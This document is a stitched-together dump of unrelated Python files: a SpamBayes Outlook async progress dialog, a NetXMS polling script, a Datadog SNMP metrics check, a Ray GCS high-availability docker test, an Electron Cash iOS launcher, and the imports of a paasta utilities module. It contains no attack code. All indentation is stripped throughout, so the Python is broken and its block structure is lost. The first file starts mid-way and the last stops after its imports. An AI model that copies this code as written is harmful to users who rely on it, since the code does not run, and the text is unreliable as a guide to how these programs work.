print "Tick", self.current_stage_tick, "is", this_prop, "through the stage,", total_prop, "through the total - ctrl tick is", control_tick
win32api.PostMessage(self.hprogress, commctrl.PBM_SETPOS, control_tick)
def _get_stage_text(self, text):
stage_name, start, end = self._get_current_stage()
if stage_name:
text = stage_name + ": " + text
return text
def set_status(self, text):
self.processor.progress_status = self._get_stage_text(text)
win32api.PostMessage(self.hdlg, MYWM_SETSTATUS)
def warning(self, text):
self.processor.progress_warning = self._get_stage_text(text)
win32api.PostMessage(self.hdlg, MYWM_SETWARNING)
def error(self, text):
self.processor.progress_error = self._get_stage_text(text)
win32api.PostMessage(self.hdlg, MYWM_SETERROR)
def request_stop(self):
self.stopping = True
def stop_requested(self):
return self.stopping
class AsyncCommandProcessor(processors.CommandButtonProcessor):
def __init__(self, window, control_ids, func, start_text, stop_text, disable_ids):
processors.CommandButtonProcessor.__init__(self, window, control_ids[:1], func, ())
self.progress_status = ""
self.progress_error = ""
self.progress_warning = ""
self.running = False
self.statusbar_id = control_ids[1]
self.statustext_id = control_ids[2]
self.process_start_text = start_text
self.process_stop_text = stop_text
dids = self.disable_while_running_ids = []
for id in disable_ids.split():
dids.append(window.manager.dialog_parser.ids[id])
def Init(self):
win32gui.ShowWindow(self.GetControl(self.statusbar_id), win32con.SW_HIDE)
self.SetStatusText("")
def Done(self):
if self.running:
msg = "You must let the running process finish before closing this window"
win32gui.MessageBox(self.window.hwnd, msg, "SpamBayes",
win32con.MB_OK | win32con.MB_ICONEXCLAMATION)
return not self.running
def Term(self):
# The Window is dieing! We *must* kill it and wait for it to finish
# else bad things happen once the main thread dies before us!
if self.running:
self.progress.request_stop()
i = 0
while self.running:
win32gui.PumpWaitingMessages(0,-1)
if i % 100 == 0:
print "Still waiting for async process to finish..."
time.sleep(0.01)
i += 1
return True
def GetMessages(self):
return [MYWM_SETSTATUS, MYWM_SETWARNING, MYWM_SETERROR, MYWM_FINISHED]
def SetEnabledStates(self, enabled):
for id in self.disable_while_running_ids:
win32gui.EnableWindow(self.GetControl(id), enabled)
def OnMessage(self, msg, wparam, lparam):
if msg == MYWM_SETSTATUS:
self.OnProgressStatus(wparam, lparam)
elif msg == MYWM_SETWARNING:
self.OnProgressWarning(wparam, lparam)
elif msg == MYWM_SETERROR:
self.OnProgressError(wparam, lparam)
elif msg == MYWM_FINISHED:
self.OnFinished(wparam, lparam)
else:
raise RuntimeError, "Not one of my messages??"
def OnFinished(self, wparam, lparam):
self.seen_finished = True
wasCancelled = wparam
self.SetEnabledStates(True)
if self.process_start_text:
win32gui.SendMessage(self.GetControl(), win32con.WM_SETTEXT,
0, self.process_start_text)
win32gui.ShowWindow(self.GetControl(self.statusbar_id), win32con.SW_HIDE)
if wasCancelled:
self.SetStatusText("Cancelled")
def SetStatusText(self, text):
win32gui.SendMessage(self.GetControl(self.statustext_id),
win32con.WM_SETTEXT,
0, text)
def OnProgressStatus(self, wparam, lparam):
self.SetStatusText(self.progress_status)
def OnProgressError(self, wparam, lparam):
self.SetStatusText(self.progress_error)
win32gui.MessageBox(self.window.hwnd,
self.progress_error, "SpamBayes",
win32con.MB_OK | win32con.MB_ICONEXCLAMATION)
if not self.running and not self.seen_finished:
self.OnFinished(0,0)
def OnProgressWarning(self, wparam, lparam):
pass
def OnClicked(self, id):
self.StartProcess()
def StartProcess(self):
if self.running:
self.progress.request_stop()
else:
# Do anything likely to fail before we screw around with the
# control states - this way the dialog doesn't look as 'dead'
progress=_Progress(self)
# Now screw around with the control states, restored when
# the thread terminates.
self.SetEnabledStates(False)
if self.process_stop_text:
win32gui.SendMessage(self.GetControl(),
win32con.WM_SETTEXT,
0, self.process_stop_text)
win32gui.SendMessage(self.GetControl(self.statustext_id),
win32con.WM_SETTEXT, 0, "")
win32gui.ShowWindow(self.GetControl(self.statusbar_id),
win32con.SW_SHOW)
# Local function for the thread target that notifies us when finished.
def thread_target(h, progress):
try:
self.progress = progress
self.seen_finished = False
self.running = True
# Drop my thread priority, so outlook can keep repainting
# and doing its stuff without getting stressed.
import win32process, win32api
THREAD_PRIORITY_BELOW_NORMAL=-1
win32process.SetThreadPriority(win32api.GetCurrentThread(), THREAD_PRIORITY_BELOW_NORMAL)
self.func( self.window.manager, self.window.config, progress)
finally:
try:
win32api.PostMessage(h, MYWM_FINISHED, self.progress.stop_requested())
except win32api.error:
# Bad window handle - already down.
pass
self.running = False
self.progress = None
# back to the program :)
import threading
t = threading.Thread(target=thread_target, args =(self.window.hwnd, progress))
t.start()
if __name__=='__main__':
verbose = 1
# Test my "multi-stage" code
class HackProgress(_Progress):
def __init__(self): # dont use dlg
self.hprogress = self.hdlg = 0
self.dlg = None
self.stopping = False
self.total_control_ticks = 40
self.current_stage = 0
self.set_stages( (("", 1.0),) )
print "Single stage test"
p = HackProgress()
p.set_max_ticks(10)
for i in range(10):
p.tick()
print "First stage test"
p = HackProgress()
stages = ("Stage 1", 0.2), ("Stage 2", 0.8)
p.set_stages(stages)
# Do stage 1
p.set_max_ticks(10)
for i in range(10):
p.tick()
# Do stage 2
p.set_max_ticks(20)
for i in range(20):
p.tick()
print "Second stage test"
p = HackProgress()
stages = ("Stage 1", 0.9), ("Stage 2", 0.1)
p.set_stages(stages)
p.set_max_ticks(10)
for i in range(7): # do a few less just to check
p.tick()
p.set_max_ticks(2)
for i in range(2):
p.tick()
print "Third stage test"
p = HackProgress()
stages = ("Stage 1", 0.9), ("Stage 2", 0.1)
p.set_stages(stages)
p.set_max_ticks(300)
for i in range(313): # do a few more just to check
p.tick()
p.set_max_ticks(2)
for i in range(2):
p.tick()
print "Done!"
|
poll_nodes_in_container.py
|
#!/usr/bin/env nxshell
import threading
import org.netxms.client.TextOutputListener
from Queue import Queue
from threading import Thread
class ProgressCallback(org.netxms.client.TextOutputListener):
def messageReceived(self, text):
print(self.tag + ": " + text.strip())
pass
def onError(self):
print(self.tag + ": onError")
pass
def setStreamId(self, streamId):
pass
def worker():
while True:
print("###: qsize %s ###" % q.qsize());
node = q.get()
cb = ProgressCallback()
cb.tag = node.objectName
#s.pollNode(node.objectId, NodePollType.CONFIGURATION_NORMAL, cb)
s.pollNode(node.objectId, NodePollType.CONFIGURATION_FULL, cb)
q.task_done()
q = Queue()
for i in range(25):
t = Thread(target=worker)
t.daemon = True
t.start()
container = s.findObjectById(7397)
nodes = [o for o in container.childrenAsArray if isinstance(o, objects.Node)]
for node in nodes:
q.put(node)
q.join()
print("######## ALL DONE")
|
snmp.py
|
# (C) Datadog, Inc. 2010-2019
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import fnmatch
import ipaddress
import json
import os
import threading
import time
from collections import defaultdict
import pysnmp.proto.rfc1902 as snmp_type
import yaml
from pyasn1.codec.ber import decoder
from pysnmp import hlapi
from pysnmp.error import PySnmpError
from pysnmp.smi import builder
from pysnmp.smi.exval import noSuchInstance, noSuchObject
from six import iteritems
from datadog_checks.base import AgentCheck, ConfigurationError, is_affirmative
from datadog_checks.base.errors import CheckException
from .config import InstanceConfig
try:
from datadog_checks.base.utils.common import total_time_to_temporal_percent
except ImportError:
# Provide fallback for agent < 6.16
def total_time_to_temporal_percent(total_time, scale=1000):
return total_time / scale * 100
try:
from datadog_agent import get_config, read_persistent_cache, write_persistent_cache
except ImportError:
def get_config(value):
return ''
def write_persistent_cache(value, key):
pass
def read_persistent_cache(value):
return ''
# Additional types that are not part of the SNMP protocol. cf RFC 2856
CounterBasedGauge64, ZeroBasedCounter64 = builder.MibBuilder().importSymbols(
'HCNUM-TC', 'CounterBasedGauge64', 'ZeroBasedCounter64'
)
# Metric type that we support
SNMP_COUNTERS = frozenset([snmp_type.Counter32.__name__, snmp_type.Counter64.__name__, ZeroBasedCounter64.__name__])
SNMP_GAUGES = frozenset(
[
snmp_type.Gauge32.__name__,
snmp_type.Unsigned32.__name__,
CounterBasedGauge64.__name__,
snmp_type.Integer.__name__,
snmp_type.Integer32.__name__,
]
)
DEFAULT_OID_BATCH_SIZE = 10
def reply_invalid(oid):
return noSuchInstance.isSameTypeWith(oid) or noSuchObject.isSameTypeWith(oid)
class SnmpCheck(AgentCheck):
SC_STATUS = 'snmp.can_check'
_running = True
_thread = None
_NON_REPEATERS = 0
_MAX_REPETITIONS = 25
def __init__(self, name, init_config, instances):
super(SnmpCheck, self).__init__(name, init_config, instances)
# Set OID batch size
self.oid_batch_size = int(init_config.get('oid_batch_size', DEFAULT_OID_BATCH_SIZE))
# Load Custom MIB directory
self.mibs_path = init_config.get('mibs_folder')
self.ignore_nonincreasing_oid = is_affirmative(init_config.get('ignore_nonincreasing_oid', False))
self.profiles = init_config.get('profiles', {})
self.profiles_by_oid = {}
confd = get_config('confd_path')
for profile, profile_data in self.profiles.items():
filename = profile_data.get('definition_file')
if filename:
if not os.path.isabs(filename):
filename = os.path.join(confd, 'snmp.d', 'profiles', filename)
try:
with open(filename) as f:
data = yaml.safe_load(f)
except Exception:
raise ConfigurationError("Couldn't read profile '{}' in '{}'".format(profile, filename))
else:
data = profile_data['definition']
self.profiles[profile] = {'definition': data}
sys_object_oid = data.get('sysobjectid')
if sys_object_oid:
self.profiles_by_oid[sys_object_oid] = profile
self.instance['name'] = self._get_instance_key(self.instance)
self._config = self._build_config(self.instance)
def _build_config(self, instance):
return InstanceConfig(
instance,
self.warning,
self.log,
self.init_config.get('global_metrics', []),
self.mibs_path,
self.profiles,
self.profiles_by_oid,
)
def _get_instance_key(self, instance):
key = instance.get('name')
if key:
return key
ip = instance.get('ip_address')
port = instance.get('port')
if ip and port:
key = '{host}:{port}'.format(host=ip, port=port)
else:
key = ip
return key
def discover_instances(self):
config = self._config
discovery_interval = config.instance.get('discovery_interval', 3600)
while self._running:
start_time = time.time()
for host in config.ip_network.hosts():
host = str(host)
if host in config.discovered_instances:
continue
instance = config.instance.copy()
instance.pop('network_address')
instance['ip_address'] = host
host_config = self._build_config(instance)
try:
sys_object_oid = self.fetch_sysobject_oid(host_config)
except Exception as e:
self.log.debug("Error scanning host %s: %s", host, e)
continue
try:
profile = self._profile_for_sysobject_oid(sys_object_oid)
except ConfigurationError:
if not (host_config.table_oids or host_config.raw_oids):
self.log.warn("Host %s didn't match a profile for sysObjectID %s", host, sys_object_oid)
continue
else:
host_config.refresh_with_profile(self.profiles[profile], self.warning, self.log)
config.discovered_instances[host] = host_config
write_persistent_cache(self.check_id, json.dumps(list(config.discovered_instances)))
time_elapsed = time.time() - start_time
if discovery_interval - time_elapsed > 0:
time.sleep(discovery_interval - time_elapsed)
def raise_on_error_indication(self, error_indication, ip_address):
if error_indication:
message = '{} for instance {}'.format(error_indication, ip_address)
raise CheckException(message)
def check_table(self, config, table_oids):
"""
Perform a snmpwalk on the domain specified by the oids, on the device
configured in instance.
Returns a dictionary:
dict[oid/metric_name][row index] = value
In case of scalar objects, the row index is just 0
"""
results = defaultdict(dict)
enforce_constraints = config.enforce_constraints
oids = []
bulk_oids = []
# Use bulk for SNMP version > 1 and there are enough symbols
bulk_limit = config.bulk_threshold if config.auth_data.mpModel else 0
for table, symbols in table_oids.items():
if not symbols:
# No table to browse, just one symbol
oids.append(table)
elif len(symbols) < bulk_limit:
oids.extend(symbols)
else:
bulk_oids.append(table)
all_binds, error = self.fetch_oids(config, oids, enforce_constraints=enforce_constraints)
for oid in bulk_oids:
try:
self.log.debug('Running SNMP command getBulk on OID %r', oid)
binds_iterator = config.call_cmd(
hlapi.bulkCmd,
self._NON_REPEATERS,
self._MAX_REPETITIONS,
oid,
lookupMib=enforce_constraints,
ignoreNonIncreasingOid=self.ignore_nonincreasing_oid,
lexicographicMode=False,
)
binds, error = self._consume_binds_iterator(binds_iterator, config)
all_binds.extend(binds)
except PySnmpError as e:
message = 'Failed to collect some metrics: {}'.format(e)
if not error:
error = message
self.warning(message)
for result_oid, value in all_binds:
if not enforce_constraints:
# if enforce_constraints is false, then MIB resolution has not been done yet
# so we need to do it manually. We have to specify the mibs that we will need
# to resolve the name.
oid_to_resolve = hlapi.ObjectIdentity(result_oid.asTuple()).loadMibs(*config.mibs_to_load)
result_oid = oid_to_resolve.resolveWithMib(config.mib_view_controller)
_, metric, indexes = result_oid.getMibSymbol()
results[metric][indexes] = value
self.log.debug('Raw results: %s', results)
# Freeze the result
results.default_factory = None
return results, error
def check_raw(self, config, oids):
"""
Perform a snmpwalk on the domain specified by the oids, on the device
configured in instance.
Returns a dictionary:
dict[oid/metric_name] = value
In case of scalar objects, the row index is just 0
"""
all_binds, error = self.fetch_oids(config, oids, enforce_constraints=False)
results = {}
for result_oid, value in all_binds:
oid = result_oid.asTuple()
matching = '.'.join(str(i) for i in oid)
results[matching] = value
self.log.debug('Raw results: %s', results)
return results, error
def fetch_oids(self, config, oids, enforce_constraints):
# UPDATE: We used to perform only a snmpgetnext command to fetch metric values.
# It returns the wrong value when the OID passeed is referring to a specific leaf.
# For example:
# snmpgetnext -v2c -c public localhost:11111 1.3.6.1.2.1.25.4.2.1.7.222
# iso.3.6.1.2.1.25.4.2.1.7.224 = INTEGER: 2
# SOLUTION: perform a snmpget command and fallback with snmpgetnext if not found
error = None
first_oid = 0
all_binds = []
while first_oid < len(oids):
try:
oids_batch = oids[first_oid : first_oid + self.oid_batch_size]
self.log.debug('Running SNMP command get on OIDS %s', oids_batch)
error_indication, error_status, _, var_binds = next(
config.call_cmd(hlapi.getCmd, *oids_batch, lookupMib=enforce_constraints)
)
self.log.debug('Returned vars: %s', var_binds)
self.raise_on_error_indication(error_indication, config.ip_address)
missing_results = []
for var in var_binds:
result_oid, value = var
if reply_invalid(value):
oid_tuple = result_oid.asTuple()
missing_results.append(hlapi.ObjectType(hlapi.ObjectIdentity(oid_tuple)))
else:
all_binds.append(var)
if missing_results:
# If we didn't catch the metric using snmpget, try snmpnext
# Don't walk through the entire MIB, stop at end of table
self.log.debug('Running SNMP command getNext on OIDS %s', missing_results)
binds_iterator = config.call_cmd(
hlapi.nextCmd,
*missing_results,
lookupMib=enforce_constraints,
ignoreNonIncreasingOid=self.ignore_nonincreasing_oid,
lexicographicMode=False
)
binds, error = self._consume_binds_iterator(binds_iterator, config)
all_binds.extend(binds)
except PySnmpError as e:
message = 'Failed to collect some metrics: {}'.format(e)
if not error:
error = message
self.warning(message)
# if we fail move onto next batch
first_oid += self.oid_batch_size
return all_binds, error
def fetch_sysobject_oid(self, config):
"""Return the sysObjectID of the instance."""
# Reference sysObjectID directly, see http://oidref.com/1.3.6.1.2.1.1.2
oid = hlapi.ObjectType(hlapi.ObjectIdentity((1, 3, 6, 1, 2, 1, 1, 2)))
self.log.debug('Running SNMP command on OID %r', oid)
error_indication, _, _, var_binds = next(config.call_cmd(hlapi.nextCmd, oid, lookupMib=False))
self.raise_on_error_indication(error_indication, config.ip_address)
self.log.debug('Returned vars: %s', var_binds)
return var_binds[0][1].prettyPrint()
def _profile_for_sysobject_oid(self, sys_object_oid):
"""Return, if any, a matching profile for sys_object_oid.
If several profiles match, it will return the longer match, ie the
closest one to the sys_object_oid.
"""
oids = [oid for oid in self.profiles_by_oid if fnmatch.fnmatch(sys_object_oid, oid)]
oids.sort()
if not oids:
raise ConfigurationError('No profile matching sysObjectID {}'.format(sys_object_oid))
return self.profiles_by_oid[oids[-1]]
def _consume_binds_iterator(self, binds_iterator, config):
all_binds = []
error = None
for error_indication, error_status, _, var_binds_table in binds_iterator:
self.log.debug('Returned vars: %s', var_binds_table)
self.raise_on_error_indication(error_indication, config.ip_address)
if error_status:
message = '{} for instance {}'.format(error_status.prettyPrint(), config.ip_address)
error = message
# submit CRITICAL service check if we can't connect to device
if 'unknownUserName' in message:
self.log.error(message)
else:
self.warning(message)
all_binds.extend(var_binds_table)
return all_binds, error
def _start_discovery(self):
cache = read_persistent_cache(self.check_id)
if cache:
hosts = json.loads(cache)
for host in hosts:
try:
ipaddress.ip_address(host)
except ValueError:
write_persistent_cache(self.check_id, json.dumps([]))
break
instance = self.instance.copy()
instance.pop('network_address')
instance['ip_address'] = host
host_config = self._build_config(instance)
self._config.discovered_instances[host] = host_config
self._thread = threading.Thread(target=self.discover_instances, name=self.name)
self._thread.daemon = True
self._thread.start()
def check(self, instance):
"""
Perform two series of SNMP requests, one for all that have MIB associated
and should be looked up and one for those specified by oids.
"""
config = self._config
if self._config.ip_network:
if self._thread is None:
self._start_discovery()
for host, discovered in list(config.discovered_instances.items()):
if self._check_with_config(discovered):
config.failing_instances[host] += 1
if config.failing_instances[host] >= config.allowed_failures:
# Remove it from discovered instances, we'll re-discover it later if it reappears
config.discovered_instances.pop(host)
# Reset the failure counter as well
config.failing_instances.pop(host)
else:
# Reset the counter if not's failing
config.failing_instances.pop(host, None)
tags = ['network:{}'.format(self._config.ip_network)]
tags.extend(config.tags)
self.gauge('snmp.discovered_devices_count', len(config.discovered_instances), tags=tags)
else:
self._check_with_config(config)
def _check_with_config(self, config):
# Reset errors
instance = config.instance
error = table_results = raw_results = None
try:
if not (config.table_oids or config.raw_oids):
sys_object_oid = self.fetch_sysobject_oid(config)
profile = self._profile_for_sysobject_oid(sys_object_oid)
config.refresh_with_profile(self.profiles[profile], self.warning, self.log)
if config.table_oids:
self.log.debug('Querying device %s for %s oids', config.ip_address, len(config.table_oids))
table_results, error = self.check_table(config, config.table_oids)
self.report_table_metrics(config.metrics, table_results, config.tags)
if config.raw_oids:
self.log.debug('Querying device %s for %s oids', config.ip_address, len(config.raw_oids))
raw_results, error = self.check_raw(config, config.raw_oids)
self.report_raw_metrics(config.metrics, raw_results, config.tags)
except CheckException as e:
error = str(e)
self.warning(error)
except Exception as e:
if not error:
error = 'Failed to collect metrics for {} - {}'.format(instance['name'], e)
self.warning(error)
finally:
# Report service checks
sc_tags = ['snmp_device:{}'.format(instance['ip_address'])]
sc_tags.extend(instance.get('tags', []))
status = self.OK
if error:
status = self.CRITICAL
if raw_results or table_results:
status = self.WARNING
self.service_check(self.SC_STATUS, status, tags=sc_tags, message=error)
return error
def report_raw_metrics(self, metrics, results, tags):
"""
For all the metrics that are specified as oid,
the conf oid is going to exactly match or be a prefix of the oid sent back by the device
Use the instance configuration to find the name to give to the metric
Submit the results to the aggregator.
"""
for metric in metrics:
if 'OID' in metric:
forced_type = metric.get('forced_type')
queried_oid = metric['OID'].lstrip('.')
if queried_oid in results:
value = results[queried_oid]
else:
for oid in results:
if oid.startswith(queried_oid):
value = results[oid]
break
else:
self.log.warning('No matching results found for oid %s', queried_oid)
continue
name = metric.get('name', 'unnamed_metric')
metric_tags = tags
if metric.get('metric_tags'):
metric_tags = metric_tags + metric.get('metric_tags')
self.submit_metric(name, value, forced_type, metric_tags)
def report_table_metrics(self, metrics, results, tags):
"""
For each of the metrics specified as needing to be resolved with mib,
gather the tags requested in the instance conf for each row.
Submit the results to the aggregator.
"""
for metric in metrics:
forced_type = metric.get('forced_type')
if 'table' in metric:
index_based_tags = []
column_based_tags = []
for metric_tag in metric.get('metric_tags', []):
tag_key = metric_tag['tag']
if 'index' in metric_tag:
index_based_tags.append((tag_key, metric_tag.get('index')))
elif 'column' in metric_tag:
column_based_tags.append((tag_key, metric_tag.get('column')))
else:
self.log.warning('No indication on what value to use for this tag')
for value_to_collect in metric.get('symbols', []):
if value_to_collect not in results:
self.log.debug('Ignoring metric %s from table %s', value_to_collect, metric['table'])
continue
for index, val in iteritems(results[value_to_collect]):
metric_tags = tags + self.get_index_tags(index, results, index_based_tags, column_based_tags)
self.submit_metric(value_to_collect, val, forced_type, metric_tags)
elif 'symbol' in metric:
name = metric['symbol']
if name not in results:
self.log.debug('Ignoring metric %s', name)
continue
result = list(results[name].items())
if len(result) > 1:
self.log.warning('Several rows corresponding while the metric is supposed to be a scalar')
continue
val = result[0][1]
metric_tags = tags + metric.get('metric_tags', [])
self.submit_metric(name, val, forced_type, metric_tags)
elif 'OID' in metric:
pass # This one is already handled by the other batch of requests
else:
raise ConfigurationError('Unsupported metric in config file: {}'.format(metric))
def get_index_tags(self, index, results, index_tags, column_tags):
"""
Gather the tags for this row of the table (index) based on the
results (all the results from the query).
index_tags and column_tags are the tags to gather.
- Those specified in index_tags contain the tag_group name and the
index of the value we want to extract from the index tuple.
cf. 1 for ipVersion in the IP-MIB::ipSystemStatsTable for example
- Those specified in column_tags contain the name of a column, which
could be a potential result, to use as a tage
cf. ifDescr in the IF-MIB::ifTable for example
"""
tags = []
for idx_tag in index_tags:
tag_group = idx_tag[0]
try:
tag_value = index[idx_tag[1] - 1].prettyPrint()
except IndexError:
self.log.warning('Not enough indexes, skipping this tag')
continue
tags.append('{}:{}'.format(tag_group, tag_value))
for col_tag in column_tags:
tag_group = col_tag[0]
try:
tag_value = results[col_tag[1]][index]
except KeyError:
self.log.warning('Column %s not present in the table, skipping this tag', col_tag[1])
continue
if reply_invalid(tag_value):
self.log.warning("Can't deduct tag from column for tag %s", tag_group)
continue
tag_value = tag_value.prettyPrint()
tags.append('{}:{}'.format(tag_group, tag_value))
return tags
def submit_metric(self, name, snmp_value, forced_type, tags=None):
"""
Convert the values reported as pysnmp-Managed Objects to values and
report them to the aggregator.
"""
tags = [] if tags is None else tags
if reply_invalid(snmp_value):
# Metrics not present in the queried object
self.log.warning('No such Mib available: %s', name)
return
metric_name = self.normalize(name, prefix='snmp')
if forced_type:
if forced_type.lower() == 'gauge':
value = int(snmp_value)
self.gauge(metric_name, value, tags)
elif forced_type.lower() == 'percent':
value = total_time_to_temporal_percent(int(snmp_value), scale=1)
self.rate(metric_name, value, tags)
elif forced_type.lower() == 'counter':
value = int(snmp_value)
self.rate(metric_name, value, tags)
elif forced_type.lower() == 'monotonic_count':
value = int(snmp_value)
self.monotonic_count(metric_name, value, tags)
else:
self.warning('Invalid forced-type specified: {} in {}'.format(forced_type, name))
raise ConfigurationError('Invalid forced-type in config file: {}'.format(name))
return
# Ugly hack but couldn't find a cleaner way
# Proper way would be to use the ASN1 method isSameTypeWith but it
# wrongfully returns True in the case of CounterBasedGauge64
# and Counter64 for example
snmp_class = snmp_value.__class__.__name__
if snmp_class in SNMP_COUNTERS:
value = int(snmp_value)
self.rate(metric_name, value, tags)
return
if snmp_class in SNMP_GAUGES:
value = int(snmp_value)
self.gauge(metric_name, value, tags)
return
if snmp_class == 'Opaque':
# Try support for floats
try:
value = float(decoder.decode(bytes(snmp_value))[0])
except Exception:
pass
else:
self.gauge(metric_name, value, tags)
return
# Falls back to try to cast the value.
try:
value = float(snmp_value)
except ValueError:
pass
else:
self.gauge(metric_name, value, tags)
return
self.log.warning('Unsupported metric type %s for %s', snmp_class, metric_name)
|
test_gcs_ha_e2e.py
|
import pytest
import sys
import threading
from time import sleep
from pytest_docker_tools import container, fetch, network
from pytest_docker_tools import wrappers
from http.client import HTTPConnection
class Container(wrappers.Container):
def ready(self):
self._container.reload()
if self.status == "exited":
from pytest_docker_tools.exceptions import ContainerFailed
raise ContainerFailed(
self,
f"Container {self.name} has already exited before "
"we noticed it was ready",
)
if self.status != "running":
return False
networks = self._container.attrs["NetworkSettings"]["Networks"]
for (_, n) in networks.items():
if not n["IPAddress"]:
return False
if "Ray runtime started" in super().logs():
return True
return False
def client(self):
port = self.ports["8000/tcp"][0]
return HTTPConnection(f"localhost:{port}")
gcs_network = network(driver="bridge")
redis_image = fetch(repository="redis:latest")
redis = container(
image="{redis_image.id}",
network="{gcs_network.name}",
command=(
"redis-server --save 60 1 --loglevel" " warning --requirepass 5241590000000000"
),
)
header_node = container(
image="ray_ci:v1",
name="gcs",
network="{gcs_network.name}",
command=["ray", "start", "--head", "--block", "--num-cpus", "0"],
environment={"RAY_REDIS_ADDRESS": "{redis.ips.primary}:6379"},
wrapper_class=Container,
ports={
"8000/tcp": None,
},
)
worker_node = container(
image="ray_ci:v1",
network="{gcs_network.name}",
command=["ray", "start", "--address", "gcs:6379", "--block"],
environment={"RAY_REDIS_ADDRESS": "{redis.ips.primary}:6379"},
wrapper_class=Container,
ports={
"8000/tcp": None,
},
)
@pytest.fixture
def docker_cluster(header_node, worker_node):
yield (header_node, worker_node)
scripts = """
import ray
import json
from fastapi import FastAPI
app = FastAPI()
from ray import serve
ray.init(address="auto", namespace="g")
@serve.deployment(name="Counter", route_prefix="/api", version="v1")
@serve.ingress(app)
class Counter:
def __init__(self):
self.count = 0
@app.get("/")
def get(self):
return {{"count": self.count}}
@app.get("/incr")
def incr(self):
self.count += 1
return {{"count": self.count}}
@app.get("/decr")
def decr(self):
self.count -= 1
return {{"count": self.count}}
@app.get("/pid")
def pid(self):
import os
return {{"pid": os.getpid()}}
serve.start(detached=True, dedicated_cpu=True)
Counter.options(num_replicas={num_replicas}).deploy()
"""
check_script = """
import requests
import json
if {num_replicas} == 1:
b = json.loads(requests.get("http://127.0.0.1:8000/api/").text)["count"]
for i in range(5):
response = requests.get("http://127.0.0.1:8000/api/incr")
assert json.loads(response.text) == {{"count": i + b + 1}}
pids = {{
json.loads(requests.get("http://127.0.0.1:8000/api/pid").text)["pid"]
for _ in range(5)
}}
print(pids)
assert len(pids) == {num_replicas}
"""
@pytest.mark.skipif(sys.platform != "linux", reason="Only works on linux.")
def test_ray_server_basic(docker_cluster):
# This test covers the basic cases for gcs ha (serve ha)
# - It starts the serve on worker nodes.
# - Check the deployment is OK
# - Stop headnode
# - Check the serve app is running healthy
# - Start a reconfig (2 replicas) and it'll hang
# - Start head node. The script will continue once GCS is back
# - Make sure two replicas are there
# TODO(iycheng): Update serve to better integrate with GCS HA:
# - Make sure no task can run in the raylet where GCS is deployed.
header, worker = docker_cluster
output = worker.exec_run(cmd=f"python -c '{scripts.format(num_replicas=1)}'")
assert output.exit_code == 0
assert b"Adding 1 replicas to deployment 'Counter'." in output.output
# somehow this is not working and the port is not exposed to the host.
# worker_cli = worker.client()
# print(worker_cli.request("GET", "/api/incr"))
output = worker.exec_run(cmd=f"python -c '{check_script.format(num_replicas=1)}'")
assert output.exit_code == 0
# Kill the head node
header.kill()
# Make sure serve is still working
output = worker.exec_run(cmd=f"python -c '{check_script.format(num_replicas=1)}'")
assert output.exit_code == 0
# Script is running on another thread so that it won't block the main thread.
def reconfig():
worker.exec_run(cmd=f"python -c '{scripts.format(num_replicas=2)}'")
t = threading.Thread(target=reconfig)
t.start()
# make sure the script started
sleep(5)
# serve reconfig should continue once GCS is back
header.restart()
t.join()
output = worker.exec_run(cmd=f"python -c '{check_script.format(num_replicas=2)}'")
assert output.exit_code == 0
if __name__ == "__main__":
sys.exit(pytest.main(["-vs", __file__]))
|
app.py
|
#
# This file is:
# Copyright (C) 2018 Calin Culianu <calin.culianu@gmail.com>
#
# MIT License
#
import os
from electroncash_gui.ios_native.monkeypatches import MonkeyPatches
from electroncash.util import set_verbosity
from electroncash_gui.ios_native import ElectrumGui
from electroncash_gui.ios_native.utils import call_later, get_user_dir, cleanup_tmp_dir, is_debug_build, NSLogSuppress, NSLog
from electroncash.simple_config import SimpleConfig
# NB: This is called from appdelegate.py "application_didFinishLaunchingWithOptions_"
def main():
cleanup_tmp_dir()
config_options = {
'verbose': is_debug_build(),
'cmd': 'gui',
'gui': 'ios_native',
'cwd': os.getcwd(),
'whitelist_servers_only' : True, # on iOS we force only the whitelist ('preferred') servers only for now as a security measure
}
set_verbosity(config_options.get('verbose'), timestamps=False, thread_id=False)
NSLogSuppress(not config_options.get('verbose'))
MonkeyPatches.patch()
config = SimpleConfig(config_options, read_user_dir_function = get_user_dir)
gui = ElectrumGui(config)
call_later(0.010, gui.main) # this is required for the activity indicator to actually animate. Switch to a direct call if not using activity indicator on Splash2
_printStats(config_options) # Prints some startup/debug stats such as Python version and SSL version (this is done in another thread to hopefully not impact startup overhead too much, as importing ssl may be a bit heavy)
return "Bitcoin Cash FTW!"
def _printStats(config_options):
import threading
def thrdfunc(config_options):
# lazy init of SSL
import ssl, sys
from electroncash import version
NSLog("DeLight lib version: %s (using server protocol: %s)", version.PACKAGE_VERSION, version.PROTOCOL_VERSION)
NSLog("Python version: %s", ' '.join(sys.version.split('\n')))
NSLog("OpenSSL version: %s", ssl.OPENSSL_VERSION)
#NSLog("Environment Vars:")
#for k,v in os.environ.copy().items():
# NSLog("%s=%s", str(k), str(v))
#NSLog("Config Vars:")
#for k,v in config_options.copy().items():
# NSLog("config[%s] = %s", str(k), str(v))
# /
# We do this from a thread so as to not delay app startup by importing more stuff we don't strictly need.
threading.Thread(target=thrdfunc, args=(config_options,), daemon=True).start()
|
utils.py
|
# Copyright 2015-2017 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import copy
import datetime
import difflib
import errno
import fcntl
import getpass
import glob
import hashlib
import io
import json
import logging
import math
import os
import pwd
import queue
import re
import shlex
import signal
import socket
import ssl
import sys
import tempfile
import threading
import time
import warnings
from collections import OrderedDict
from enum import Enum
from fnmatch import fnmatch
from functools import lru_cache
from functools import wraps
from subprocess import PIPE
from subprocess import Popen
from subprocess import STDOUT
from types import FrameType
from typing import Any
from typing import Callable
from typing import cast
from typing import Collection
from typing import ContextManager
from typing import Dict
from typing import FrozenSet
from typing import IO
from typing import Iterable
from typing import Iterator
from typing import List
from typing import Mapping
from typing import Optional
from typing import Sequence
from typing import Set
from typing import Tuple
from typing import Type
from typing import TypeVar
from typing import Union
import choice
import dateutil.tz
import ldap3
import requests_cache
import service_configuration_lib
from docker import Client
from docker.utils import kwargs_from_env
from kazoo.client import KazooClient
from mypy_extensions import TypedDict
from service_configuration_lib import read_service_configuration
import paasta_tools.cli.fsm
